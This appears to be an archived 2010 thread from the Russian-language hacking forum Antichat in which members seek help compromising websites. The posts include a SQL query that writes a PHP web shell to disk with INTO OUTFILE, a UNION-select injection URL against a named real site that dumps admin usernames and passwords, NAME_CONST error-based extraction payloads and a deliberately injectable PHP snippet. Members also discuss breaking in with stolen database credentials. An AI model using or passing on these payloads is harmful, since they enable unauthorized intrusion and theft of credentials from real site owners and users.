ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.03.2010, 18:27
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 10
Провел на форуме:
33287
Репутация:
0
|
|
Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?
|
|
|
07.03.2010, 19:34
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
что взломать?
|
|
|
|
07.03.2010, 20:46
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>
|
|
|
|
07.03.2010, 20:51
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от scorpic393
Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>
PHP код:
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>
|
|
|
|
07.03.2010, 21:31
|
|
Новичок
Регистрация: 24.12.2008
Сообщений: 12
Провел на форуме:
32210
Репутация:
1
|
|
Люди, подскажите, есть доступ к mysql , рутовский как бы.
но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';
но не могу найти папку с правами на залив.
что делать?
|
|
|
|
07.03.2010, 21:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от navai
Люди, подскажите, есть доступ к mysql , рутовский как бы.
но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';
но не могу найти папку с правами на залив.
что делать?
http://tinyurl.com/yb2gm96
|
|
|
|
07.03.2010, 23:53
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Почему не логиниться???
http://www.sflcn.com/admin
выдрал логин пасс
http://www.sflcn.com/story.php?id=-8069+union+select+1,2,group_concat%28username,0x3a ,userpassword%29,4,5,6,7,8+from+users
Попробуйте плиз. может у меня руки кривые |
|
|
|
08.03.2010, 01:25
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
2 scorpic393
во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
|
|
|
|
08.03.2010, 01:40
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
90%?)) имхо ты ошибаешся
|
|
|
|
08.03.2010, 12:18
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Вот таким образом выводится нужные мне значения но по одному, меняя лимит
UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a
Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1961375){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1961627){kind=avatar}
Похожие темы
Комбинированный вид